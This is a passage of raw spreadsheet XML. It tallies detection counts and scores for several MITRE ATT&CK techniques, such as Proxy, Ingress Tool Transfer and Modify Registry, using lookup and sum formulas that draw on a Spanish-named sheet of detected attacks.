        <v>1</v>
      </c>
      <c r="BN21" s="394">
        <v>2</v>
      </c>
      <c r="BO21" s="292">
        <v>2</v>
      </c>
      <c r="BP21" s="322">
        <v>2</v>
      </c>
      <c r="BQ21" s="322">
        <v>0</v>
      </c>
      <c r="BR21" s="12">
        <v>1</v>
      </c>
      <c r="BS21" s="12">
        <v>0</v>
      </c>
      <c r="BT21" s="13">
        <v>1</v>
      </c>
      <c r="BU21" s="394">
        <v>2</v>
      </c>
      <c r="BV21" s="292">
        <v>0</v>
      </c>
      <c r="BW21" s="322">
        <v>0</v>
      </c>
      <c r="BX21" s="322">
        <v>0</v>
      </c>
      <c r="BY21" s="12">
        <v>0</v>
      </c>
      <c r="BZ21" s="13">
        <v>0</v>
      </c>
      <c r="CA21" s="394">
        <v>0</v>
      </c>
      <c r="CB21" s="292">
        <v>0</v>
      </c>
      <c r="CC21" s="322">
        <v>0</v>
      </c>
      <c r="CD21" s="322">
        <v>0</v>
      </c>
      <c r="CE21" s="12">
        <v>0</v>
      </c>
      <c r="CF21" s="12">
        <v>0</v>
      </c>
      <c r="CG21" s="13">
        <v>0</v>
      </c>
      <c r="CH21" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:86" ht="15" customHeight="1">
      <c r="A22" s="4">
        <f t="shared" si="0"/>
        <v>20</v>
      </c>
      <c r="B22" s="4" t="str">
        <f>IFERROR(VLOOKUP(A22,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1090</v>
      </c>
      <c r="C22" s="493" t="str">
        <f>IFERROR(VLOOKUP(B22,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Proxy</v>
      </c>
      <c r="D22" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B22)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E22" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>23</v>
      </c>
      <c r="F22" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (23)</v>
      </c>
      <c r="G22" s="292">
        <v>4</v>
      </c>
      <c r="H22" s="322">
        <v>4</v>
      </c>
      <c r="I22" s="322">
        <v>0</v>
      </c>
      <c r="J22" s="12">
        <v>2</v>
      </c>
      <c r="K22" s="13">
        <v>1</v>
      </c>
      <c r="L22" s="394">
        <v>2</v>
      </c>
      <c r="M22" s="322">
        <v>6</v>
      </c>
      <c r="N22" s="322">
        <v>6</v>
      </c>
      <c r="O22" s="322">
        <v>0</v>
      </c>
      <c r="P22" s="12">
        <v>3</v>
      </c>
      <c r="Q22" s="13">
        <v>1</v>
      </c>
      <c r="R22" s="394">
        <v>2</v>
      </c>
      <c r="S22" s="292">
        <v>10</v>
      </c>
      <c r="T22" s="322">
        <v>10</v>
      </c>
      <c r="U22" s="322">
        <v>0</v>
      </c>
      <c r="V22" s="12">
        <v>5</v>
      </c>
      <c r="W22" s="13">
        <v>1</v>
      </c>
      <c r="X22" s="394">
        <v>3</v>
      </c>
      <c r="Y22" s="392">
        <v>57</v>
      </c>
      <c r="Z22" s="392">
        <v>21</v>
      </c>
      <c r="AA22" s="322">
        <v>0</v>
      </c>
      <c r="AB22" s="392">
        <v>4</v>
      </c>
      <c r="AC22" s="16">
        <v>1</v>
      </c>
      <c r="AD22" s="394">
        <v>17</v>
      </c>
      <c r="AE22" s="392">
        <v>42</v>
      </c>
      <c r="AF22" s="392">
        <v>12</v>
      </c>
      <c r="AG22" s="322">
        <v>0</v>
      </c>
      <c r="AH22" s="392">
        <v>6</v>
      </c>
      <c r="AI22" s="16">
        <v>1</v>
      </c>
      <c r="AJ22" s="394">
        <v>5</v>
      </c>
      <c r="AK22" s="392">
        <v>99</v>
      </c>
      <c r="AL22" s="392">
        <v>33</v>
      </c>
      <c r="AM22" s="322">
        <v>0</v>
      </c>
      <c r="AN22" s="392">
        <v>10</v>
      </c>
      <c r="AO22" s="16">
        <v>1</v>
      </c>
      <c r="AP22" s="394">
        <v>17</v>
      </c>
      <c r="AQ22" s="292">
        <v>0</v>
      </c>
      <c r="AR22" s="322">
        <v>0</v>
      </c>
      <c r="AS22" s="322">
        <v>0</v>
      </c>
      <c r="AT22" s="12">
        <v>0</v>
      </c>
      <c r="AU22" s="13">
        <v>0</v>
      </c>
      <c r="AV22" s="394">
        <v>0</v>
      </c>
      <c r="AW22" s="392">
        <v>0</v>
      </c>
      <c r="AX22" s="392">
        <v>0</v>
      </c>
      <c r="AY22" s="322">
        <v>0</v>
      </c>
      <c r="AZ22" s="4">
        <v>0</v>
      </c>
      <c r="BA22" s="16">
        <v>0</v>
      </c>
      <c r="BB22" s="394">
        <v>0</v>
      </c>
      <c r="BC22" s="292">
        <v>10</v>
      </c>
      <c r="BD22" s="322">
        <v>10</v>
      </c>
      <c r="BE22" s="322">
        <v>0</v>
      </c>
      <c r="BF22" s="12">
        <v>5</v>
      </c>
      <c r="BG22" s="13">
        <v>1</v>
      </c>
      <c r="BH22" s="394">
        <v>3</v>
      </c>
      <c r="BI22" s="292">
        <v>7</v>
      </c>
      <c r="BJ22" s="322">
        <v>4</v>
      </c>
      <c r="BK22" s="322">
        <v>0</v>
      </c>
      <c r="BL22" s="12">
        <v>1</v>
      </c>
      <c r="BM22" s="13">
        <v>1</v>
      </c>
      <c r="BN22" s="394">
        <v>4</v>
      </c>
      <c r="BO22" s="292">
        <v>61</v>
      </c>
      <c r="BP22" s="322">
        <v>29</v>
      </c>
      <c r="BQ22" s="322">
        <v>0</v>
      </c>
      <c r="BR22" s="12">
        <v>1</v>
      </c>
      <c r="BS22" s="12">
        <v>5</v>
      </c>
      <c r="BT22" s="13">
        <v>1</v>
      </c>
      <c r="BU22" s="394">
        <v>20</v>
      </c>
      <c r="BV22" s="292">
        <v>6</v>
      </c>
      <c r="BW22" s="322">
        <v>4</v>
      </c>
      <c r="BX22" s="322">
        <v>0</v>
      </c>
      <c r="BY22" s="12">
        <v>1</v>
      </c>
      <c r="BZ22" s="13">
        <v>1</v>
      </c>
      <c r="CA22" s="394">
        <v>4</v>
      </c>
      <c r="CB22" s="292">
        <v>53</v>
      </c>
      <c r="CC22" s="322">
        <v>19</v>
      </c>
      <c r="CD22" s="322">
        <v>0</v>
      </c>
      <c r="CE22" s="12">
        <v>1</v>
      </c>
      <c r="CF22" s="12">
        <v>1</v>
      </c>
      <c r="CG22" s="13">
        <v>1</v>
      </c>
      <c r="CH22" s="394">
        <v>15</v>
      </c>
    </row>
    <row r="23" spans="1:86" ht="15" customHeight="1">
      <c r="A23" s="4">
        <f t="shared" si="0"/>
        <v>21</v>
      </c>
      <c r="B23" s="4" t="str">
        <f>IFERROR(VLOOKUP(A23,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1095</v>
      </c>
      <c r="C23" s="493" t="str">
        <f>IFERROR(VLOOKUP(B23,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="D23" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B23)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E23" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F23" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (2)</v>
      </c>
      <c r="G23" s="292">
        <v>3</v>
      </c>
      <c r="H23" s="322">
        <v>2</v>
      </c>
      <c r="I23" s="322">
        <v>0</v>
      </c>
      <c r="J23" s="12">
        <v>2</v>
      </c>
      <c r="K23" s="13">
        <v>1</v>
      </c>
      <c r="L23" s="394">
        <v>2</v>
      </c>
      <c r="M23" s="322">
        <v>4</v>
      </c>
      <c r="N23" s="322">
        <v>4</v>
      </c>
      <c r="O23" s="322">
        <v>0</v>
      </c>
      <c r="P23" s="12">
        <v>4</v>
      </c>
      <c r="Q23" s="13">
        <v>1</v>
      </c>
      <c r="R23" s="394">
        <v>2</v>
      </c>
      <c r="S23" s="292">
        <v>7</v>
      </c>
      <c r="T23" s="322">
        <v>6</v>
      </c>
      <c r="U23" s="322">
        <v>0</v>
      </c>
      <c r="V23" s="12">
        <v>6</v>
      </c>
      <c r="W23" s="13">
        <v>1</v>
      </c>
      <c r="X23" s="394">
        <v>2</v>
      </c>
      <c r="Y23" s="392">
        <v>18</v>
      </c>
      <c r="Z23" s="392">
        <v>8</v>
      </c>
      <c r="AA23" s="322">
        <v>0</v>
      </c>
      <c r="AB23" s="392">
        <v>8</v>
      </c>
      <c r="AC23" s="16">
        <v>1</v>
      </c>
      <c r="AD23" s="394">
        <v>2</v>
      </c>
      <c r="AE23" s="392">
        <v>12</v>
      </c>
      <c r="AF23" s="392">
        <v>9</v>
      </c>
      <c r="AG23" s="322">
        <v>0</v>
      </c>
      <c r="AH23" s="392">
        <v>9</v>
      </c>
      <c r="AI23" s="16">
        <v>1</v>
      </c>
      <c r="AJ23" s="394">
        <v>2</v>
      </c>
      <c r="AK23" s="392">
        <v>30</v>
      </c>
      <c r="AL23" s="392">
        <v>17</v>
      </c>
      <c r="AM23" s="322">
        <v>0</v>
      </c>
      <c r="AN23" s="392">
        <v>17</v>
      </c>
      <c r="AO23" s="16">
        <v>1</v>
      </c>
      <c r="AP23" s="394">
        <v>2</v>
      </c>
      <c r="AQ23" s="292">
        <v>0</v>
      </c>
      <c r="AR23" s="322">
        <v>0</v>
      </c>
      <c r="AS23" s="322">
        <v>0</v>
      </c>
      <c r="AT23" s="12">
        <v>0</v>
      </c>
      <c r="AU23" s="13">
        <v>0</v>
      </c>
      <c r="AV23" s="394">
        <v>0</v>
      </c>
      <c r="AW23" s="392">
        <v>3</v>
      </c>
      <c r="AX23" s="392">
        <v>2</v>
      </c>
      <c r="AY23" s="322">
        <v>0</v>
      </c>
      <c r="AZ23" s="4">
        <v>2</v>
      </c>
      <c r="BA23" s="16">
        <v>1</v>
      </c>
      <c r="BB23" s="394">
        <v>1</v>
      </c>
      <c r="BC23" s="292">
        <v>10</v>
      </c>
      <c r="BD23" s="322">
        <v>8</v>
      </c>
      <c r="BE23" s="322">
        <v>0</v>
      </c>
      <c r="BF23" s="12">
        <v>8</v>
      </c>
      <c r="BG23" s="13">
        <v>1</v>
      </c>
      <c r="BH23" s="394">
        <v>2</v>
      </c>
      <c r="BI23" s="292">
        <v>3</v>
      </c>
      <c r="BJ23" s="322">
        <v>2</v>
      </c>
      <c r="BK23" s="322">
        <v>0</v>
      </c>
      <c r="BL23" s="12">
        <v>1</v>
      </c>
      <c r="BM23" s="13">
        <v>1</v>
      </c>
      <c r="BN23" s="394">
        <v>2</v>
      </c>
      <c r="BO23" s="292">
        <v>4</v>
      </c>
      <c r="BP23" s="322">
        <v>3</v>
      </c>
      <c r="BQ23" s="322">
        <v>0</v>
      </c>
      <c r="BR23" s="12">
        <v>1</v>
      </c>
      <c r="BS23" s="12">
        <v>1</v>
      </c>
      <c r="BT23" s="13">
        <v>1</v>
      </c>
      <c r="BU23" s="394">
        <v>2</v>
      </c>
      <c r="BV23" s="292">
        <v>2</v>
      </c>
      <c r="BW23" s="322">
        <v>2</v>
      </c>
      <c r="BX23" s="322">
        <v>0</v>
      </c>
      <c r="BY23" s="12">
        <v>1</v>
      </c>
      <c r="BZ23" s="13">
        <v>1</v>
      </c>
      <c r="CA23" s="394">
        <v>2</v>
      </c>
      <c r="CB23" s="292">
        <v>3</v>
      </c>
      <c r="CC23" s="322">
        <v>3</v>
      </c>
      <c r="CD23" s="322">
        <v>0</v>
      </c>
      <c r="CE23" s="12">
        <v>1</v>
      </c>
      <c r="CF23" s="12">
        <v>1</v>
      </c>
      <c r="CG23" s="13">
        <v>1</v>
      </c>
      <c r="CH23" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="24" spans="1:86" ht="15" customHeight="1">
      <c r="A24" s="4">
        <f t="shared" si="0"/>
        <v>22</v>
      </c>
      <c r="B24" s="4" t="str">
        <f>IFERROR(VLOOKUP(A24,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1102</v>
      </c>
      <c r="C24" s="493" t="str">
        <f>IFERROR(VLOOKUP(B24,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Web Service</v>
      </c>
      <c r="D24" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B24)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E24" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F24" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (2)</v>
      </c>
      <c r="G24" s="292">
        <v>3</v>
      </c>
      <c r="H24" s="322">
        <v>3</v>
      </c>
      <c r="I24" s="322">
        <v>0</v>
      </c>
      <c r="J24" s="12">
        <v>3</v>
      </c>
      <c r="K24" s="13">
        <v>1</v>
      </c>
      <c r="L24" s="394">
        <v>1</v>
      </c>
      <c r="M24" s="322">
        <v>3</v>
      </c>
      <c r="N24" s="322">
        <v>3</v>
      </c>
      <c r="O24" s="322">
        <v>0</v>
      </c>
      <c r="P24" s="12">
        <v>3</v>
      </c>
      <c r="Q24" s="13">
        <v>1</v>
      </c>
      <c r="R24" s="394">
        <v>1</v>
      </c>
      <c r="S24" s="292">
        <v>6</v>
      </c>
      <c r="T24" s="322">
        <v>6</v>
      </c>
      <c r="U24" s="322">
        <v>0</v>
      </c>
      <c r="V24" s="12">
        <v>6</v>
      </c>
      <c r="W24" s="13">
        <v>1</v>
      </c>
      <c r="X24" s="394">
        <v>2</v>
      </c>
      <c r="Y24" s="392">
        <v>17</v>
      </c>
      <c r="Z24" s="392">
        <v>4</v>
      </c>
      <c r="AA24" s="322">
        <v>0</v>
      </c>
      <c r="AB24" s="392">
        <v>4</v>
      </c>
      <c r="AC24" s="16">
        <v>1</v>
      </c>
      <c r="AD24" s="394">
        <v>2</v>
      </c>
      <c r="AE24" s="392">
        <v>8</v>
      </c>
      <c r="AF24" s="392">
        <v>6</v>
      </c>
      <c r="AG24" s="322">
        <v>0</v>
      </c>
      <c r="AH24" s="392">
        <v>5</v>
      </c>
      <c r="AI24" s="16">
        <v>1</v>
      </c>
      <c r="AJ24" s="394">
        <v>2</v>
      </c>
      <c r="AK24" s="392">
        <v>25</v>
      </c>
      <c r="AL24" s="392">
        <v>10</v>
      </c>
      <c r="AM24" s="322">
        <v>0</v>
      </c>
      <c r="AN24" s="392">
        <v>9</v>
      </c>
      <c r="AO24" s="16">
        <v>1</v>
      </c>
      <c r="AP24" s="394">
        <v>2</v>
      </c>
      <c r="AQ24" s="292">
        <v>0</v>
      </c>
      <c r="AR24" s="322">
        <v>0</v>
      </c>
      <c r="AS24" s="322">
        <v>0</v>
      </c>
      <c r="AT24" s="12">
        <v>0</v>
      </c>
      <c r="AU24" s="13">
        <v>0</v>
      </c>
      <c r="AV24" s="394">
        <v>0</v>
      </c>
      <c r="AW24" s="392">
        <v>0</v>
      </c>
      <c r="AX24" s="392">
        <v>0</v>
      </c>
      <c r="AY24" s="322">
        <v>0</v>
      </c>
      <c r="AZ24" s="4">
        <v>0</v>
      </c>
      <c r="BA24" s="16">
        <v>0</v>
      </c>
      <c r="BB24" s="394">
        <v>0</v>
      </c>
      <c r="BC24" s="292">
        <v>6</v>
      </c>
      <c r="BD24" s="322">
        <v>6</v>
      </c>
      <c r="BE24" s="322">
        <v>0</v>
      </c>
      <c r="BF24" s="12">
        <v>6</v>
      </c>
      <c r="BG24" s="13">
        <v>1</v>
      </c>
      <c r="BH24" s="394">
        <v>2</v>
      </c>
      <c r="BI24" s="292">
        <v>3</v>
      </c>
      <c r="BJ24" s="322">
        <v>2</v>
      </c>
      <c r="BK24" s="322">
        <v>0</v>
      </c>
      <c r="BL24" s="12">
        <v>2</v>
      </c>
      <c r="BM24" s="13">
        <v>1</v>
      </c>
      <c r="BN24" s="394">
        <v>2</v>
      </c>
      <c r="BO24" s="292">
        <v>5</v>
      </c>
      <c r="BP24" s="322">
        <v>4</v>
      </c>
      <c r="BQ24" s="322">
        <v>0</v>
      </c>
      <c r="BR24" s="12">
        <v>2</v>
      </c>
      <c r="BS24" s="12">
        <v>2</v>
      </c>
      <c r="BT24" s="13">
        <v>1</v>
      </c>
      <c r="BU24" s="394">
        <v>2</v>
      </c>
      <c r="BV24" s="292">
        <v>1</v>
      </c>
      <c r="BW24" s="322">
        <v>1</v>
      </c>
      <c r="BX24" s="322">
        <v>0</v>
      </c>
      <c r="BY24" s="12">
        <v>1</v>
      </c>
      <c r="BZ24" s="13">
        <v>1</v>
      </c>
      <c r="CA24" s="394">
        <v>1</v>
      </c>
      <c r="CB24" s="292">
        <v>6</v>
      </c>
      <c r="CC24" s="322">
        <v>2</v>
      </c>
      <c r="CD24" s="322">
        <v>0</v>
      </c>
      <c r="CE24" s="12">
        <v>1</v>
      </c>
      <c r="CF24" s="12">
        <v>1</v>
      </c>
      <c r="CG24" s="13">
        <v>1</v>
      </c>
      <c r="CH24" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:86" ht="15" customHeight="1">
      <c r="A25" s="4">
        <f t="shared" si="0"/>
        <v>23</v>
      </c>
      <c r="B25" s="4" t="str">
        <f>IFERROR(VLOOKUP(A25,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1104</v>
      </c>
      <c r="C25" s="493" t="str">
        <f>IFERROR(VLOOKUP(B25,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Multi-Stage Channels</v>
      </c>
      <c r="D25" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B25)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E25" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F25" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="G25" s="292">
        <v>0</v>
      </c>
      <c r="H25" s="322">
        <v>0</v>
      </c>
      <c r="I25" s="322">
        <v>0</v>
      </c>
      <c r="J25" s="12">
        <v>0</v>
      </c>
      <c r="K25" s="13">
        <v>0</v>
      </c>
      <c r="L25" s="394">
        <v>0</v>
      </c>
      <c r="M25" s="322">
        <v>3</v>
      </c>
      <c r="N25" s="322">
        <v>3</v>
      </c>
      <c r="O25" s="322">
        <v>0</v>
      </c>
      <c r="P25" s="12">
        <v>3</v>
      </c>
      <c r="Q25" s="13">
        <v>1</v>
      </c>
      <c r="R25" s="394">
        <v>1</v>
      </c>
      <c r="S25" s="292">
        <v>3</v>
      </c>
      <c r="T25" s="322">
        <v>3</v>
      </c>
      <c r="U25" s="322">
        <v>0</v>
      </c>
      <c r="V25" s="12">
        <v>3</v>
      </c>
      <c r="W25" s="13">
        <v>1</v>
      </c>
      <c r="X25" s="394">
        <v>1</v>
      </c>
      <c r="Y25" s="392">
        <v>19</v>
      </c>
      <c r="Z25" s="392">
        <v>1</v>
      </c>
      <c r="AA25" s="322">
        <v>0</v>
      </c>
      <c r="AB25" s="392">
        <v>1</v>
      </c>
      <c r="AC25" s="16">
        <v>1</v>
      </c>
      <c r="AD25" s="394">
        <v>1</v>
      </c>
      <c r="AE25" s="392">
        <v>7</v>
      </c>
      <c r="AF25" s="392">
        <v>5</v>
      </c>
      <c r="AG25" s="322">
        <v>0</v>
      </c>
      <c r="AH25" s="392">
        <v>5</v>
      </c>
      <c r="AI25" s="16">
        <v>1</v>
      </c>
      <c r="AJ25" s="394">
        <v>1</v>
      </c>
      <c r="AK25" s="392">
        <v>26</v>
      </c>
      <c r="AL25" s="392">
        <v>6</v>
      </c>
      <c r="AM25" s="322">
        <v>0</v>
      </c>
      <c r="AN25" s="392">
        <v>6</v>
      </c>
      <c r="AO25" s="16">
        <v>1</v>
      </c>
      <c r="AP25" s="394">
        <v>1</v>
      </c>
      <c r="AQ25" s="292">
        <v>0</v>
      </c>
      <c r="AR25" s="322">
        <v>0</v>
      </c>
      <c r="AS25" s="322">
        <v>0</v>
      </c>
      <c r="AT25" s="12">
        <v>0</v>
      </c>
      <c r="AU25" s="13">
        <v>0</v>
      </c>
      <c r="AV25" s="394">
        <v>0</v>
      </c>
      <c r="AW25" s="392">
        <v>0</v>
      </c>
      <c r="AX25" s="392">
        <v>0</v>
      </c>
      <c r="AY25" s="322">
        <v>0</v>
      </c>
      <c r="AZ25" s="4">
        <v>0</v>
      </c>
      <c r="BA25" s="16">
        <v>0</v>
      </c>
      <c r="BB25" s="394">
        <v>0</v>
      </c>
      <c r="BC25" s="292">
        <v>3</v>
      </c>
      <c r="BD25" s="322">
        <v>3</v>
      </c>
      <c r="BE25" s="322">
        <v>0</v>
      </c>
      <c r="BF25" s="12">
        <v>3</v>
      </c>
      <c r="BG25" s="13">
        <v>1</v>
      </c>
      <c r="BH25" s="394">
        <v>1</v>
      </c>
      <c r="BI25" s="292">
        <v>2</v>
      </c>
      <c r="BJ25" s="322">
        <v>1</v>
      </c>
      <c r="BK25" s="322">
        <v>0</v>
      </c>
      <c r="BL25" s="12">
        <v>1</v>
      </c>
      <c r="BM25" s="13">
        <v>1</v>
      </c>
      <c r="BN25" s="394">
        <v>1</v>
      </c>
      <c r="BO25" s="292">
        <v>3</v>
      </c>
      <c r="BP25" s="322">
        <v>2</v>
      </c>
      <c r="BQ25" s="322">
        <v>0</v>
      </c>
      <c r="BR25" s="12">
        <v>1</v>
      </c>
      <c r="BS25" s="12">
        <v>1</v>
      </c>
      <c r="BT25" s="13">
        <v>1</v>
      </c>
      <c r="BU25" s="394">
        <v>1</v>
      </c>
      <c r="BV25" s="292">
        <v>1</v>
      </c>
      <c r="BW25" s="322">
        <v>1</v>
      </c>
      <c r="BX25" s="322">
        <v>0</v>
      </c>
      <c r="BY25" s="12">
        <v>1</v>
      </c>
      <c r="BZ25" s="13">
        <v>1</v>
      </c>
      <c r="CA25" s="394">
        <v>1</v>
      </c>
      <c r="CB25" s="292">
        <v>6</v>
      </c>
      <c r="CC25" s="322">
        <v>2</v>
      </c>
      <c r="CD25" s="322">
        <v>0</v>
      </c>
      <c r="CE25" s="12">
        <v>1</v>
      </c>
      <c r="CF25" s="12">
        <v>1</v>
      </c>
      <c r="CG25" s="13">
        <v>1</v>
      </c>
      <c r="CH25" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:86" ht="15" customHeight="1">
      <c r="A26" s="4">
        <f t="shared" si="0"/>
        <v>24</v>
      </c>
      <c r="B26" s="4" t="str">
        <f>IFERROR(VLOOKUP(A26,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1105</v>
      </c>
      <c r="C26" s="493" t="str">
        <f>IFERROR(VLOOKUP(B26,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Ingress Tool Transfer</v>
      </c>
      <c r="D26" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B26)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E26" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F26" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (7)</v>
      </c>
      <c r="G26" s="292">
        <v>6</v>
      </c>
      <c r="H26" s="322">
        <v>3</v>
      </c>
      <c r="I26" s="322">
        <v>0</v>
      </c>
      <c r="J26" s="12">
        <v>2</v>
      </c>
      <c r="K26" s="13">
        <v>1</v>
      </c>
      <c r="L26" s="394">
        <v>2</v>
      </c>
      <c r="M26" s="322">
        <v>4</v>
      </c>
      <c r="N26" s="322">
        <v>4</v>
      </c>
      <c r="O26" s="322">
        <v>0</v>
      </c>
      <c r="P26" s="12">
        <v>2</v>
      </c>
      <c r="Q26" s="13">
        <v>1</v>
      </c>
      <c r="R26" s="394">
        <v>4</v>
      </c>
      <c r="S26" s="292">
        <v>10</v>
      </c>
      <c r="T26" s="322">
        <v>7</v>
      </c>
      <c r="U26" s="322">
        <v>0</v>
      </c>
      <c r="V26" s="12">
        <v>4</v>
      </c>
      <c r="W26" s="13">
        <v>1</v>
      </c>
      <c r="X26" s="394">
        <v>4</v>
      </c>
      <c r="Y26" s="392">
        <v>7</v>
      </c>
      <c r="Z26" s="392">
        <v>4</v>
      </c>
      <c r="AA26" s="322">
        <v>0</v>
      </c>
      <c r="AB26" s="392">
        <v>3</v>
      </c>
      <c r="AC26" s="16">
        <v>1</v>
      </c>
      <c r="AD26" s="394">
        <v>2</v>
      </c>
      <c r="AE26" s="392">
        <v>11</v>
      </c>
      <c r="AF26" s="392">
        <v>9</v>
      </c>
      <c r="AG26" s="322">
        <v>0</v>
      </c>
      <c r="AH26" s="392">
        <v>7</v>
      </c>
      <c r="AI26" s="16">
        <v>1</v>
      </c>
      <c r="AJ26" s="394">
        <v>5</v>
      </c>
      <c r="AK26" s="392">
        <v>18</v>
      </c>
      <c r="AL26" s="392">
        <v>13</v>
      </c>
      <c r="AM26" s="322">
        <v>0</v>
      </c>
      <c r="AN26" s="392">
        <v>10</v>
      </c>
      <c r="AO26" s="16">
        <v>1</v>
      </c>
      <c r="AP26" s="394">
        <v>5</v>
      </c>
      <c r="AQ26" s="292">
        <v>0</v>
      </c>
      <c r="AR26" s="322">
        <v>0</v>
      </c>
      <c r="AS26" s="322">
        <v>0</v>
      </c>
      <c r="AT26" s="12">
        <v>0</v>
      </c>
      <c r="AU26" s="13">
        <v>0</v>
      </c>
      <c r="AV26" s="394">
        <v>0</v>
      </c>
      <c r="AW26" s="392">
        <v>0</v>
      </c>
      <c r="AX26" s="392">
        <v>0</v>
      </c>
      <c r="AY26" s="322">
        <v>0</v>
      </c>
      <c r="AZ26" s="4">
        <v>0</v>
      </c>
      <c r="BA26" s="16">
        <v>0</v>
      </c>
      <c r="BB26" s="394">
        <v>0</v>
      </c>
      <c r="BC26" s="292">
        <v>10</v>
      </c>
      <c r="BD26" s="322">
        <v>7</v>
      </c>
      <c r="BE26" s="322">
        <v>0</v>
      </c>
      <c r="BF26" s="12">
        <v>4</v>
      </c>
      <c r="BG26" s="13">
        <v>1</v>
      </c>
      <c r="BH26" s="394">
        <v>4</v>
      </c>
      <c r="BI26" s="292">
        <v>1</v>
      </c>
      <c r="BJ26" s="322">
        <v>1</v>
      </c>
      <c r="BK26" s="322">
        <v>0</v>
      </c>
      <c r="BL26" s="12">
        <v>1</v>
      </c>
      <c r="BM26" s="13">
        <v>1</v>
      </c>
      <c r="BN26" s="394">
        <v>1</v>
      </c>
      <c r="BO26" s="292">
        <v>6</v>
      </c>
      <c r="BP26" s="322">
        <v>2</v>
      </c>
      <c r="BQ26" s="322">
        <v>0</v>
      </c>
      <c r="BR26" s="12">
        <v>1</v>
      </c>
      <c r="BS26" s="12">
        <v>1</v>
      </c>
      <c r="BT26" s="13">
        <v>1</v>
      </c>
      <c r="BU26" s="394">
        <v>2</v>
      </c>
      <c r="BV26" s="292">
        <v>2</v>
      </c>
      <c r="BW26" s="322">
        <v>2</v>
      </c>
      <c r="BX26" s="322">
        <v>0</v>
      </c>
      <c r="BY26" s="12">
        <v>1</v>
      </c>
      <c r="BZ26" s="13">
        <v>1</v>
      </c>
      <c r="CA26" s="394">
        <v>2</v>
      </c>
      <c r="CB26" s="292">
        <v>4</v>
      </c>
      <c r="CC26" s="322">
        <v>4</v>
      </c>
      <c r="CD26" s="322">
        <v>0</v>
      </c>
      <c r="CE26" s="12">
        <v>1</v>
      </c>
      <c r="CF26" s="12">
        <v>1</v>
      </c>
      <c r="CG26" s="13">
        <v>1</v>
      </c>
      <c r="CH26" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="27" spans="1:86" ht="15" customHeight="1">
      <c r="A27" s="4">
        <f t="shared" si="0"/>
        <v>25</v>
      </c>
      <c r="B27" s="4" t="str">
        <f>IFERROR(VLOOKUP(A27,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1112</v>
      </c>
      <c r="C27" s="493" t="str">
        <f>IFERROR(VLOOKUP(B27,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Modify Registry</v>
      </c>
      <c r="D27" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B27)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E27" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>15</v>
      </c>
